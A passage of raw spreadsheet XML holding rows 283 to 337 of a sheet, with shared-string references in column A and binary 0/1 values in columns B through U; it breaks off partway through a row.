    <row r="283" spans="1:21" ht="30">
      <c r="A283" s="3" t="s">
        <v>282</v>
      </c>
      <c r="B283" s="1">
        <v>0</v>
      </c>
      <c r="C283" s="14">
        <v>0</v>
      </c>
      <c r="D283" s="5">
        <v>0</v>
      </c>
      <c r="E283" s="5">
        <v>0</v>
      </c>
      <c r="F283" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U283" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="284" spans="1:21" ht="30">
      <c r="A284" s="3" t="s">
        <v>283</v>
      </c>
      <c r="B284" s="1">
        <v>1</v>
      </c>
      <c r="C284" s="14">
        <v>0</v>
      </c>
      <c r="D284" s="5">
        <v>0</v>
      </c>
      <c r="E284" s="5">
        <v>0</v>
      </c>
      <c r="F284" s="5">
        <v>1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M284" s="1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7">
        <v>0</v>
      </c>
      <c r="U284" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="285" spans="1:21" ht="30">
      <c r="A285" s="3" t="s">
        <v>284</v>
      </c>
      <c r="B285" s="1">
        <v>0</v>
      </c>
      <c r="C285" s="14">
        <v>0</v>
      </c>
      <c r="D285" s="5">
        <v>0</v>
      </c>
      <c r="E285" s="5">
        <v>0</v>
      </c>
      <c r="F285" s="5">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U285" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="286" spans="1:21" ht="30">
      <c r="A286" s="3" t="s">
        <v>285</v>
      </c>
      <c r="B286" s="1">
        <v>1</v>
      </c>
      <c r="C286" s="14">
        <v>0</v>
      </c>
      <c r="D286" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U286" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="287" spans="1:21" ht="30">
      <c r="A287" s="3" t="s">
        <v>286</v>
      </c>
      <c r="B287" s="1">
        <v>1</v>
      </c>
      <c r="C287" s="14">
        <v>0</v>
      </c>
      <c r="D287" s="5">
        <v>0</v>
      </c>
      <c r="E287" s="5">
        <v>0</v>
      </c>
      <c r="F287" s="5">
        <v>1</v>
      </c>
      <c r="G287" s="5">
        <v>0</v>
      </c>
      <c r="H287" s="5">
        <v>1</v>
      </c>
      <c r="I287" s="5">
        <v>0</v>
      </c>
      <c r="J287" s="5">
        <v>0</v>
      </c>
      <c r="K287" s="5">
        <v>1</v>
      </c>
      <c r="L287" s="5">
        <v>0</v>
      </c>
      <c r="M287" s="1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7">
        <v>0</v>
      </c>
      <c r="U287" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="288" spans="1:21" ht="30">
      <c r="A288" s="3" t="s">
        <v>287</v>
      </c>
      <c r="B288" s="1">
        <v>1</v>
      </c>
      <c r="C288" s="14">
        <v>0</v>
      </c>
      <c r="D288" s="5">
        <v>0</v>
      </c>
      <c r="E288" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U288" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="289" spans="1:21" ht="30">
      <c r="A289" s="3" t="s">
        <v>288</v>
      </c>
      <c r="B289" s="1">
        <v>1</v>
      </c>
      <c r="C289" s="14">
        <v>1</v>
      </c>
      <c r="D289" s="5">
        <v>0</v>
      </c>
      <c r="E289" s="5">
        <v>1</v>
      </c>
      <c r="F289" s="5">
        <v>0</v>
      </c>
      <c r="G289" s="5">
        <v>0</v>
      </c>
      <c r="H289" s="5">
        <v>1</v>
      </c>
      <c r="I289" s="5">
        <v>0</v>
      </c>
      <c r="J289" s="5">
        <v>0</v>
      </c>
      <c r="K289" s="5">
        <v>0</v>
      </c>
      <c r="L289" s="5">
        <v>0</v>
      </c>
      <c r="M289" s="1">
        <v>0</v>
      </c>
      <c r="N289" s="14">
        <v>0</v>
      </c>
      <c r="O289" s="14">
        <v>0</v>
      </c>
      <c r="P289" s="14">
        <v>0</v>
      </c>
      <c r="Q289" s="14">
        <v>1</v>
      </c>
      <c r="R289" s="14">
        <v>0</v>
      </c>
      <c r="S289" s="14">
        <v>0</v>
      </c>
      <c r="T289" s="7">
        <v>0</v>
      </c>
      <c r="U289" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="290" spans="1:21" ht="30">
      <c r="A290" s="3" t="s">
        <v>289</v>
      </c>
      <c r="B290" s="1">
        <v>0</v>
      </c>
      <c r="C290" s="14">
        <v>0</v>
      </c>
      <c r="D290" s="5">
        <v>0</v>
      </c>
      <c r="E290" s="5">
        <v>0</v>
      </c>
      <c r="F290" s="5">
        <v>1</v>
      </c>
      <c r="G290" s="5">
        <v>0</v>
      </c>
      <c r="H290" s="5">
        <v>0</v>
      </c>
      <c r="I290" s="5">
        <v>1</v>
      </c>
      <c r="J290" s="5">
        <v>0</v>
      </c>
      <c r="K290" s="5">
        <v>0</v>
      </c>
      <c r="L290" s="5">
        <v>0</v>
      </c>
      <c r="M290" s="1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7">
        <v>0</v>
      </c>
      <c r="U290" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="291" spans="1:21">
      <c r="A291" s="3" t="s">
        <v>290</v>
      </c>
      <c r="B291" s="1">
        <v>1</v>
      </c>
      <c r="C291" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U291" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="292" spans="1:21" ht="30">
      <c r="A292" s="3" t="s">
        <v>291</v>
      </c>
      <c r="B292" s="1">
        <v>1</v>
      </c>
      <c r="C292" s="14">
        <v>0</v>
      </c>
      <c r="D292" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U292" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="293" spans="1:21">
      <c r="A293" s="3" t="s">
        <v>292</v>
      </c>
      <c r="B293" s="1">
        <v>1</v>
      </c>
      <c r="C293" s="14">
        <v>0</v>
      </c>
      <c r="D293" s="5">
        <v>0</v>
      </c>
      <c r="E293" s="5">
        <v>0</v>
      </c>
      <c r="F293" s="5">
        <v>1</v>
      </c>
      <c r="G293" s="5">
        <v>0</v>
      </c>
      <c r="H293" s="5">
        <v>1</v>
      </c>
      <c r="I293" s="5">
        <v>0</v>
      </c>
      <c r="J293" s="5">
        <v>0</v>
      </c>
      <c r="K293" s="5">
        <v>0</v>
      </c>
      <c r="L293" s="5">
        <v>0</v>
      </c>
      <c r="M293" s="1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7">
        <v>0</v>
      </c>
      <c r="U293" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="294" spans="1:21">
      <c r="A294" s="3" t="s">
        <v>293</v>
      </c>
      <c r="B294" s="1">
        <v>0</v>
      </c>
      <c r="C294" s="14">
        <v>0</v>
      </c>
      <c r="D294" s="5">
        <v>0</v>
      </c>
      <c r="E294" s="5">
        <v>1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1</v>
      </c>
      <c r="M294" s="1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7">
        <v>0</v>
      </c>
      <c r="U294" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="295" spans="1:21" ht="30">
      <c r="A295" s="3" t="s">
        <v>294</v>
      </c>
      <c r="B295" s="1">
        <v>1</v>
      </c>
      <c r="C295" s="14">
        <v>1</v>
      </c>
      <c r="D295" s="5">
        <v>0</v>
      </c>
      <c r="E295" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N295" s="14">
        <v>0</v>
      </c>
      <c r="O295" s="14">
        <v>0</v>
      </c>
      <c r="P295" s="14">
        <v>1</v>
      </c>
      <c r="Q295" s="14">
        <v>0</v>
      </c>
      <c r="R295" s="14">
        <v>0</v>
      </c>
      <c r="S295" s="14">
        <v>0</v>
      </c>
      <c r="T295" s="7">
        <v>0</v>
      </c>
      <c r="U295" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="296" spans="1:21">
      <c r="A296" s="3" t="s">
        <v>295</v>
      </c>
      <c r="B296" s="1">
        <v>0</v>
      </c>
      <c r="C296" s="14">
        <v>0</v>
      </c>
      <c r="D296" s="5">
        <v>0</v>
      </c>
      <c r="E296" s="5">
        <v>1</v>
      </c>
      <c r="F296" s="5">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U296" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="297" spans="1:21" ht="30">
      <c r="A297" s="3" t="s">
        <v>296</v>
      </c>
      <c r="B297" s="1">
        <v>1</v>
      </c>
      <c r="C297" s="14">
        <v>0</v>
      </c>
      <c r="D297" s="5">
        <v>0</v>
      </c>
      <c r="E297" s="5">
        <v>0</v>
      </c>
      <c r="F297" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U297" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="298" spans="1:21" ht="30">
      <c r="A298" s="3" t="s">
        <v>297</v>
      </c>
      <c r="B298" s="1">
        <v>1</v>
      </c>
      <c r="C298" s="14">
        <v>1</v>
      </c>
      <c r="D298" s="5">
        <v>0</v>
      </c>
      <c r="E298" s="5">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U298" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="299" spans="1:21" ht="90">
      <c r="A299" s="3" t="s">
        <v>298</v>
      </c>
      <c r="B299" s="1">
        <v>0</v>
      </c>
      <c r="C299" s="1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1</v>
      </c>
      <c r="M299" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U299" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="300" spans="1:21" ht="30">
      <c r="A300" s="3" t="s">
        <v>299</v>
      </c>
      <c r="B300" s="1">
        <v>0</v>
      </c>
      <c r="C300" s="14">
        <v>0</v>
      </c>
      <c r="D300" s="5">
        <v>0</v>
      </c>
      <c r="E300" s="5">
        <v>0</v>
      </c>
      <c r="F300" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U300" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="301" spans="1:21">
      <c r="A301" s="3" t="s">
        <v>300</v>
      </c>
      <c r="B301" s="1">
        <v>1</v>
      </c>
      <c r="C301" s="14">
        <v>0</v>
      </c>
      <c r="D301" s="5">
        <v>0</v>
      </c>
      <c r="E301" s="5">
        <v>1</v>
      </c>
      <c r="F301" s="5">
        <v>1</v>
      </c>
      <c r="G301" s="5">
        <v>0</v>
      </c>
      <c r="H301" s="5">
        <v>1</v>
      </c>
      <c r="I301" s="5">
        <v>0</v>
      </c>
      <c r="J301" s="5">
        <v>0</v>
      </c>
      <c r="K301" s="5">
        <v>0</v>
      </c>
      <c r="L301" s="5">
        <v>0</v>
      </c>
      <c r="M301" s="1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7">
        <v>0</v>
      </c>
      <c r="U301" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="302" spans="1:21" ht="30">
      <c r="A302" s="3" t="s">
        <v>301</v>
      </c>
      <c r="B302" s="1">
        <v>0</v>
      </c>
      <c r="C302" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U302" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="303" spans="1:21" ht="30">
      <c r="A303" s="3" t="s">
        <v>302</v>
      </c>
      <c r="B303" s="1">
        <v>1</v>
      </c>
      <c r="C303" s="14">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N303" s="14">
        <v>0</v>
      </c>
      <c r="O303" s="14">
        <v>1</v>
      </c>
      <c r="P303" s="14">
        <v>0</v>
      </c>
      <c r="Q303" s="14">
        <v>0</v>
      </c>
      <c r="R303" s="14">
        <v>0</v>
      </c>
      <c r="S303" s="14">
        <v>0</v>
      </c>
      <c r="T303" s="7">
        <v>0</v>
      </c>
      <c r="U303" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="304" spans="1:21" ht="30">
      <c r="A304" s="3" t="s">
        <v>303</v>
      </c>
      <c r="B304" s="1">
        <v>0</v>
      </c>
      <c r="C304" s="14">
        <v>1</v>
      </c>
      <c r="D304" s="5">
        <v>0</v>
      </c>
      <c r="E304" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U304" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="305" spans="1:21" ht="45">
      <c r="A305" s="3" t="s">
        <v>304</v>
      </c>
      <c r="B305" s="1">
        <v>1</v>
      </c>
      <c r="C305" s="14">
        <v>1</v>
      </c>
      <c r="D305" s="5">
        <v>0</v>
      </c>
      <c r="E305" s="5">
        <v>0</v>
      </c>
      <c r="F305" s="5">
        <v>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1">
        <v>0</v>
      </c>
      <c r="N305" s="14">
        <v>0</v>
      </c>
      <c r="O305" s="14">
        <v>0</v>
      </c>
      <c r="P305" s="14">
        <v>0</v>
      </c>
      <c r="Q305" s="14">
        <v>1</v>
      </c>
      <c r="R305" s="14">
        <v>0</v>
      </c>
      <c r="S305" s="14">
        <v>0</v>
      </c>
      <c r="T305" s="7">
        <v>0</v>
      </c>
      <c r="U305" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="306" spans="1:21" ht="30">
      <c r="A306" s="3" t="s">
        <v>305</v>
      </c>
      <c r="B306" s="1">
        <v>0</v>
      </c>
      <c r="C306" s="14">
        <v>0</v>
      </c>
      <c r="D306" s="5">
        <v>0</v>
      </c>
      <c r="E306" s="5">
        <v>0</v>
      </c>
      <c r="F306" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U306" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="307" spans="1:21">
      <c r="A307" s="3" t="s">
        <v>306</v>
      </c>
      <c r="B307" s="1">
        <v>0</v>
      </c>
      <c r="C307" s="14">
        <v>0</v>
      </c>
      <c r="D307" s="5">
        <v>0</v>
      </c>
      <c r="E307" s="5">
        <v>1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1</v>
      </c>
      <c r="M307" s="1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7">
        <v>0</v>
      </c>
      <c r="U307" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="308" spans="1:21" ht="30">
      <c r="A308" s="3" t="s">
        <v>307</v>
      </c>
      <c r="B308" s="1">
        <v>1</v>
      </c>
      <c r="C308" s="14">
        <v>0</v>
      </c>
      <c r="D308" s="5">
        <v>0</v>
      </c>
      <c r="E308" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U308" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="309" spans="1:21" ht="30">
      <c r="A309" s="3" t="s">
        <v>308</v>
      </c>
      <c r="B309" s="1">
        <v>1</v>
      </c>
      <c r="C309" s="14">
        <v>1</v>
      </c>
      <c r="D309" s="5">
        <v>0</v>
      </c>
      <c r="E309" s="5">
        <v>1</v>
      </c>
      <c r="F309" s="5">
        <v>0</v>
      </c>
      <c r="G309" s="5">
        <v>0</v>
      </c>
      <c r="H309" s="5">
        <v>1</v>
      </c>
      <c r="I309" s="5">
        <v>0</v>
      </c>
      <c r="J309" s="5">
        <v>0</v>
      </c>
      <c r="K309" s="5">
        <v>0</v>
      </c>
      <c r="L309" s="5">
        <v>0</v>
      </c>
      <c r="M309" s="1">
        <v>0</v>
      </c>
      <c r="N309" s="14">
        <v>0</v>
      </c>
      <c r="O309" s="14">
        <v>0</v>
      </c>
      <c r="P309" s="14">
        <v>0</v>
      </c>
      <c r="Q309" s="14">
        <v>1</v>
      </c>
      <c r="R309" s="14">
        <v>0</v>
      </c>
      <c r="S309" s="14">
        <v>0</v>
      </c>
      <c r="T309" s="7">
        <v>0</v>
      </c>
      <c r="U309" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="310" spans="1:21" ht="30">
      <c r="A310" s="3" t="s">
        <v>309</v>
      </c>
      <c r="B310" s="1">
        <v>1</v>
      </c>
      <c r="C310" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U310" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="311" spans="1:21" ht="45">
      <c r="A311" s="3" t="s">
        <v>310</v>
      </c>
      <c r="B311" s="1">
        <v>0</v>
      </c>
      <c r="C311" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U311" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="312" spans="1:21">
      <c r="A312" s="3" t="s">
        <v>311</v>
      </c>
      <c r="B312" s="1">
        <v>0</v>
      </c>
      <c r="C312" s="14">
        <v>0</v>
      </c>
      <c r="D312" s="5">
        <v>0</v>
      </c>
      <c r="E312" s="5">
        <v>1</v>
      </c>
      <c r="F312" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U312" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="313" spans="1:21" ht="30">
      <c r="A313" s="3" t="s">
        <v>312</v>
      </c>
      <c r="B313" s="1">
        <v>1</v>
      </c>
      <c r="C313" s="14">
        <v>1</v>
      </c>
      <c r="D313" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U313" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="314" spans="1:21" ht="30">
      <c r="A314" s="3" t="s">
        <v>313</v>
      </c>
      <c r="B314" s="1">
        <v>1</v>
      </c>
      <c r="C314" s="14">
        <v>0</v>
      </c>
      <c r="D314" s="5">
        <v>0</v>
      </c>
      <c r="E314" s="5">
        <v>1</v>
      </c>
      <c r="F314" s="5">
        <v>1</v>
      </c>
      <c r="G314" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U314" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="315" spans="1:21" ht="30">
      <c r="A315" s="3" t="s">
        <v>314</v>
      </c>
      <c r="B315" s="1">
        <v>0</v>
      </c>
      <c r="C315" s="14">
        <v>0</v>
      </c>
      <c r="D315" s="5">
        <v>0</v>
      </c>
      <c r="E315" s="5">
        <v>1</v>
      </c>
      <c r="F315" s="5">
        <v>1</v>
      </c>
      <c r="G315" s="5">
        <v>0</v>
      </c>
      <c r="H315" s="5">
        <v>0</v>
      </c>
      <c r="I315" s="5">
        <v>1</v>
      </c>
      <c r="J315" s="5">
        <v>0</v>
      </c>
      <c r="K315" s="5">
        <v>0</v>
      </c>
      <c r="L315" s="5">
        <v>0</v>
      </c>
      <c r="M315" s="1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4">
        <v>0</v>
      </c>
      <c r="T315" s="7">
        <v>0</v>
      </c>
      <c r="U315" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="316" spans="1:21">
      <c r="A316" s="3" t="s">
        <v>315</v>
      </c>
      <c r="B316" s="1">
        <v>0</v>
      </c>
      <c r="C316" s="1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1</v>
      </c>
      <c r="M316" s="1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7">
        <v>0</v>
      </c>
      <c r="U316" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="317" spans="1:21">
      <c r="A317" s="3" t="s">
        <v>316</v>
      </c>
      <c r="B317" s="1">
        <v>1</v>
      </c>
      <c r="C317" s="14">
        <v>1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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U317" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="318" spans="1:21">
      <c r="A318" s="3" t="s">
        <v>317</v>
      </c>
      <c r="B318" s="1">
        <v>1</v>
      </c>
      <c r="C318" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U318" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="319" spans="1:21">
      <c r="A319" s="3" t="s">
        <v>318</v>
      </c>
      <c r="B319" s="1">
        <v>1</v>
      </c>
      <c r="C319" s="1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0</v>
      </c>
      <c r="M319" s="1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7">
        <v>0</v>
      </c>
      <c r="U319" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="320" spans="1:21" ht="30">
      <c r="A320" s="3" t="s">
        <v>319</v>
      </c>
      <c r="B320" s="1">
        <v>1</v>
      </c>
      <c r="C320" s="14">
        <v>0</v>
      </c>
      <c r="D320" s="5">
        <v>0</v>
      </c>
      <c r="E320" s="5">
        <v>1</v>
      </c>
      <c r="F320" s="5">
        <v>1</v>
      </c>
      <c r="G320" s="5">
        <v>0</v>
      </c>
      <c r="H320" s="5">
        <v>1</v>
      </c>
      <c r="I320" s="5">
        <v>0</v>
      </c>
      <c r="J320" s="5">
        <v>0</v>
      </c>
      <c r="K320" s="5">
        <v>0</v>
      </c>
      <c r="L320" s="5">
        <v>0</v>
      </c>
      <c r="M320" s="1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7">
        <v>0</v>
      </c>
      <c r="U320" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="321" spans="1:21" ht="45">
      <c r="A321" s="3" t="s">
        <v>320</v>
      </c>
      <c r="B321" s="1">
        <v>1</v>
      </c>
      <c r="C321" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U321" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="322" spans="1:21">
      <c r="A322" s="3" t="s">
        <v>321</v>
      </c>
      <c r="B322" s="1">
        <v>1</v>
      </c>
      <c r="C322" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U322" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="323" spans="1:21">
      <c r="A323" s="3" t="s">
        <v>322</v>
      </c>
      <c r="B323" s="1">
        <v>1</v>
      </c>
      <c r="C323" s="14">
        <v>0</v>
      </c>
      <c r="D323" s="5">
        <v>0</v>
      </c>
      <c r="E323" s="5">
        <v>0</v>
      </c>
      <c r="F323" s="5">
        <v>1</v>
      </c>
      <c r="G323" s="5">
        <v>0</v>
      </c>
      <c r="H323" s="5">
        <v>1</v>
      </c>
      <c r="I323" s="5">
        <v>0</v>
      </c>
      <c r="J323" s="5">
        <v>0</v>
      </c>
      <c r="K323" s="5">
        <v>0</v>
      </c>
      <c r="L323" s="5">
        <v>0</v>
      </c>
      <c r="M323" s="1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7">
        <v>0</v>
      </c>
      <c r="U323" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="324" spans="1:21">
      <c r="A324" s="3" t="s">
        <v>323</v>
      </c>
      <c r="B324" s="1">
        <v>1</v>
      </c>
      <c r="C324" s="14">
        <v>0</v>
      </c>
      <c r="D324" s="5">
        <v>0</v>
      </c>
      <c r="E324" s="5">
        <v>0</v>
      </c>
      <c r="F324" s="5">
        <v>1</v>
      </c>
      <c r="G324" s="5">
        <v>0</v>
      </c>
      <c r="H324" s="5">
        <v>0</v>
      </c>
      <c r="I324" s="5">
        <v>0</v>
      </c>
      <c r="J324" s="5">
        <v>1</v>
      </c>
      <c r="K324" s="5">
        <v>0</v>
      </c>
      <c r="L324" s="5">
        <v>0</v>
      </c>
      <c r="M324" s="1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7">
        <v>0</v>
      </c>
      <c r="U324" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="325" spans="1:21">
      <c r="A325" s="3" t="s">
        <v>324</v>
      </c>
      <c r="B325" s="1">
        <v>0</v>
      </c>
      <c r="C325" s="1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</v>
      </c>
      <c r="M325" s="1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7">
        <v>0</v>
      </c>
      <c r="U325" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="326" spans="1:21">
      <c r="A326" s="3" t="s">
        <v>325</v>
      </c>
      <c r="B326" s="1">
        <v>1</v>
      </c>
      <c r="C326" s="1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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U326" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="327" spans="1:21">
      <c r="A327" s="3" t="s">
        <v>326</v>
      </c>
      <c r="B327" s="1">
        <v>1</v>
      </c>
      <c r="C327" s="14">
        <v>1</v>
      </c>
      <c r="D327" s="5">
        <v>0</v>
      </c>
      <c r="E327" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N327" s="14">
        <v>0</v>
      </c>
      <c r="O327" s="14">
        <v>0</v>
      </c>
      <c r="P327" s="14">
        <v>1</v>
      </c>
      <c r="Q327" s="14">
        <v>0</v>
      </c>
      <c r="R327" s="14">
        <v>0</v>
      </c>
      <c r="S327" s="14">
        <v>0</v>
      </c>
      <c r="T327" s="7">
        <v>0</v>
      </c>
      <c r="U327" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="328" spans="1:21">
      <c r="A328" s="3" t="s">
        <v>327</v>
      </c>
      <c r="B328" s="1">
        <v>1</v>
      </c>
      <c r="C328" s="14">
        <v>0</v>
      </c>
      <c r="D328" s="5">
        <v>0</v>
      </c>
      <c r="E328" s="5">
        <v>0</v>
      </c>
      <c r="F328" s="5">
        <v>1</v>
      </c>
      <c r="G328" s="5">
        <v>0</v>
      </c>
      <c r="H328" s="5">
        <v>0</v>
      </c>
      <c r="I328" s="5">
        <v>0</v>
      </c>
      <c r="J328" s="5">
        <v>1</v>
      </c>
      <c r="K328" s="5">
        <v>0</v>
      </c>
      <c r="L328" s="5">
        <v>0</v>
      </c>
      <c r="M328" s="1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7">
        <v>0</v>
      </c>
      <c r="U328" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="329" spans="1:21" ht="105">
      <c r="A329" s="3" t="s">
        <v>328</v>
      </c>
      <c r="B329" s="1">
        <v>0</v>
      </c>
      <c r="C329" s="14">
        <v>0</v>
      </c>
      <c r="D329" s="5">
        <v>0</v>
      </c>
      <c r="E329" s="5">
        <v>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1</v>
      </c>
      <c r="M329" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U329" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="330" spans="1:21" ht="45">
      <c r="A330" s="3" t="s">
        <v>329</v>
      </c>
      <c r="B330" s="1">
        <v>1</v>
      </c>
      <c r="C330" s="14">
        <v>1</v>
      </c>
      <c r="D330" s="5">
        <v>0</v>
      </c>
      <c r="E330" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N330" s="14">
        <v>0</v>
      </c>
      <c r="O330" s="14">
        <v>0</v>
      </c>
      <c r="P330" s="14">
        <v>0</v>
      </c>
      <c r="Q330" s="14">
        <v>1</v>
      </c>
      <c r="R330" s="14">
        <v>0</v>
      </c>
      <c r="S330" s="14">
        <v>0</v>
      </c>
      <c r="T330" s="7">
        <v>0</v>
      </c>
      <c r="U330" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="331" spans="1:21" ht="30">
      <c r="A331" s="3" t="s">
        <v>330</v>
      </c>
      <c r="B331" s="1">
        <v>1</v>
      </c>
      <c r="C331" s="14">
        <v>0</v>
      </c>
      <c r="D331" s="5">
        <v>0</v>
      </c>
      <c r="E331" s="5">
        <v>1</v>
      </c>
      <c r="F331" s="5">
        <v>0</v>
      </c>
      <c r="G331" s="5">
        <v>0</v>
      </c>
      <c r="H331" s="5">
        <v>1</v>
      </c>
      <c r="I331" s="5">
        <v>0</v>
      </c>
      <c r="J331" s="5">
        <v>0</v>
      </c>
      <c r="K331" s="5">
        <v>0</v>
      </c>
      <c r="L331" s="5">
        <v>0</v>
      </c>
      <c r="M331" s="1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7">
        <v>1</v>
      </c>
      <c r="U331" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="332" spans="1:21" ht="30">
      <c r="A332" s="3" t="s">
        <v>331</v>
      </c>
      <c r="B332" s="1">
        <v>1</v>
      </c>
      <c r="C332" s="14">
        <v>0</v>
      </c>
      <c r="D332" s="5">
        <v>0</v>
      </c>
      <c r="E332" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U332" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="333" spans="1:21">
      <c r="A333" s="3" t="s">
        <v>332</v>
      </c>
      <c r="B333" s="1">
        <v>0</v>
      </c>
      <c r="C333" s="14">
        <v>0</v>
      </c>
      <c r="D333" s="5">
        <v>0</v>
      </c>
      <c r="E333" s="5">
        <v>0</v>
      </c>
      <c r="F333" s="5">
        <v>1</v>
      </c>
      <c r="G333" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U333" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="334" spans="1:21" ht="30">
      <c r="A334" s="3" t="s">
        <v>333</v>
      </c>
      <c r="B334" s="1">
        <v>1</v>
      </c>
      <c r="C334" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U334" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="335" spans="1:21">
      <c r="A335" s="3" t="s">
        <v>334</v>
      </c>
      <c r="B335" s="1">
        <v>1</v>
      </c>
      <c r="C335" s="14">
        <v>0</v>
      </c>
      <c r="D335" s="5">
        <v>0</v>
      </c>
      <c r="E335" s="5">
        <v>1</v>
      </c>
      <c r="F335" s="5">
        <v>0</v>
      </c>
      <c r="G335" s="5">
        <v>0</v>
      </c>
      <c r="H335" s="5">
        <v>1</v>
      </c>
      <c r="I335" s="5">
        <v>0</v>
      </c>
      <c r="J335" s="5">
        <v>0</v>
      </c>
      <c r="K335" s="5">
        <v>0</v>
      </c>
      <c r="L335" s="5">
        <v>0</v>
      </c>
      <c r="M335" s="1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7">
        <v>0</v>
      </c>
      <c r="U335" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="336" spans="1:21" ht="45">
      <c r="A336" s="3" t="s">
        <v>335</v>
      </c>
      <c r="B336" s="1">
        <v>1</v>
      </c>
      <c r="C336" s="14">
        <v>1</v>
      </c>
      <c r="D336" s="5">
        <v>0</v>
      </c>
      <c r="E336" s="5">
        <v>1</v>
      </c>
      <c r="F336" s="5">
        <v>0</v>
      </c>
      <c r="G336" s="5">
        <v>0</v>
      </c>
      <c r="H336" s="5">
        <v>1</v>
      </c>
      <c r="I336" s="5">
        <v>0</v>
      </c>
      <c r="J336" s="5">
        <v>0</v>
      </c>
      <c r="K336" s="5">
        <v>0</v>
      </c>
      <c r="L336" s="5">
        <v>0</v>
      </c>
      <c r="M336" s="1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1</v>
      </c>
      <c r="T336" s="7">
        <v>0</v>
      </c>
      <c r="U336" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="337" spans="1:21">
      <c r="A337" s="3" t="s">
        <v>336</v>
      </c>
      <c r="B337" s="1">
        <v>1</v>
      </c>
      <c r="C337" s="14">
        <v>0</v>
      </c>
      <c r="D337" s="5">
        <v>0</v>
      </c>
      <c r="E337" s="5">
        <v>1</v>
      </c>
      <c r="F337" s="5">
        <v>1</v>
      </c>
      <c r="G337" s="5">
        <v>0</v>
      </c>
      <c r="H337" s="5">
        <v>1</v>
      </c>
      <c r="I337" s="5">
        <v>0</v>
      </c>
      <c r="J337" s="5">
        <v>0</v>
      </c>
      <c r="K337" s="5">
        <v>0</v>
      </c>
      <c r="L337" s="5">
        <v>0</v>
      </c>
      <c r="M337" s="1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7">
        <v>0</v>
      </c>
      <c r="U337" s="1">
